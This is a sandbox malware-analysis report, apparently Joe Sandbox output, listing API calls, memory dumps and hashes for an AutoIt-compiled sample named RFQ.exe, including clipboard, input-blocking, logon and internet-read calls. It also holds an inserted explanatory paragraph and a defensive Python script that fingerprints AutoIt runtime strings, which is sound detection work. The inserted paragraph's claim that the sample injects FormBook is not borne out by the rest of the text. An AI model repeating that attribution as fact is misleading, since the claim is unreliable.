• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
Strings
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N@
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                          • String ID:
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-3360698832
                                                                          • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                          • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
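The String ID of the record above lists the script directives (#include, #requireadmin, #NoAutoIt3Execute and the rest) that this function compares with __wcsnicmp, i.e. case-insensitively and as wide strings, and the progress-window record earlier on the page creates a window named "AutoIt v3". Together they identify RFQ.exe as an AutoIt v3 compiled executable: a stock interpreter carrying an embedded script, which is the part that later injects FormBook. The script below is an added example, not code from the report or from Joe Sandbox. It pulls the markers out of a String ID line in the report's own `$`-separated form, then scans a byte buffer for them as ASCII and as UTF-16LE, case-insensitively like the runtime's own compare. The two sample buffers are constructed for the example, and the minimum-length and two-marker thresholds are assumptions, not values from the page.

```python
"""Offline fingerprint for the AutoIt v3 runtime strings seen in the report (added example)."""
import re


def markers_from_string_id(line, min_len=6):
    """Split a report 'String ID:' line into its '$'-separated strings.

    Tokens shorter than min_len (e.g. '#ce', '#cs') are dropped because they
    are too short to mean anything on their own; the threshold is an assumption.
    """
    body = line.split("String ID:", 1)[-1]
    return [t.strip() for t in body.split("$") if len(t.strip()) >= min_len]


# Copied from the report: the String ID line of the __wcsnicmp record.
DIRECTIVE_STRING_ID = (
    "• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$"
    "#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$"
    "Cannot parse #include$Unterminated group of comments"
)

# Markers: the window name from the progress-window record plus the directives.
AUTOIT_MARKERS = ["AutoIt v3"] + markers_from_string_id(DIRECTIVE_STRING_ID)


def _pattern(marker):
    # The runtime uses the wide-character APIs (CreateWindowExW, __wcsnicmp),
    # so the strings sit in the binary as UTF-16LE; plain ASCII is checked too.
    alts = [re.escape(marker.encode(enc)) for enc in ("ascii", "utf-16-le")]
    return re.compile(b"|".join(alts), re.IGNORECASE)


PATTERNS = {m: _pattern(m) for m in AUTOIT_MARKERS}


def scan(blob):
    """Map each marker found in blob to the byte offsets where it occurs."""
    hits = {}
    for marker, pat in PATTERNS.items():
        offsets = [m.start() for m in pat.finditer(blob)]
        if offsets:
            hits[marker] = offsets
    return hits


def looks_like_autoit(blob, min_markers=2):
    """True when at least min_markers distinct markers are present (assumed threshold)."""
    return len(scan(blob)) >= min_markers


def _wide(s):
    return s.encode("utf-16-le")


# Constructed test buffers, not real samples: one carries three markers as wide
# strings (one upper-cased, which the runtime's case-insensitive compare still
# accepts), the other carries none.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 60 + _wide("AutoIt v3") + b"\x00\x00" + b"\x90" * 16
    + _wide("#NoAutoIt3Execute") + b"\x00\x00" + _wide("#REQUIREADMIN") + b"\xcc" * 8
)
SAMPLE_OTHER = b"MZ" + b"\x00" * 40 + b"Hello, world" + b"\x00" * 20

if __name__ == "__main__":
    for name, blob in (("autoit", SAMPLE_AUTOIT), ("other", SAMPLE_OTHER)):
        print(name, looks_like_autoit(blob), scan(blob))
```

The markers come straight from the report, so the check is only as good as this build of the runtime; a sample that strips or re-encodes these strings will not trip it, which is why the threshold counts distinct markers rather than any single one.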
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID:
                                                                          • API String ID: 1675784387-0
                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1582027408-0
                                                                          • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                          • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3217815495-966354055
                                                                          • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                          • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
